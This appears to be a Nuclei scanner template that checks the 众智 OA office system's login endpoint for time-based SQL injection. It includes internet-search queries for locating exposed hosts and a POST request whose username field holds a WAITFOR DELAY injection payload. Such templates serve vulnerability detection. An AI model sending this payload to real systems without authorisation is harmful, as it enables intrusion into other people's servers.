id: zzoa-Account-Login-sqli
info:
  name: 众智 OA 办公系统 Login - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - demo
  metadata:
    verified: false
    fofa-query: body="/Account/Login?ACT=Index"
    hunter-query: web.body="/Account/Login?ACT=Index"
  tags: zzoa,oa,sqli,time

http:
  - raw:
      - |
        @timeout: 15s
        POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg
        +xml,*/*;q=0.8
        Accept-Encoding: gzip, deflate

        username=1');WAITFOR+DELAY+'0:0:6'--&password=1&RememberMe=false
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and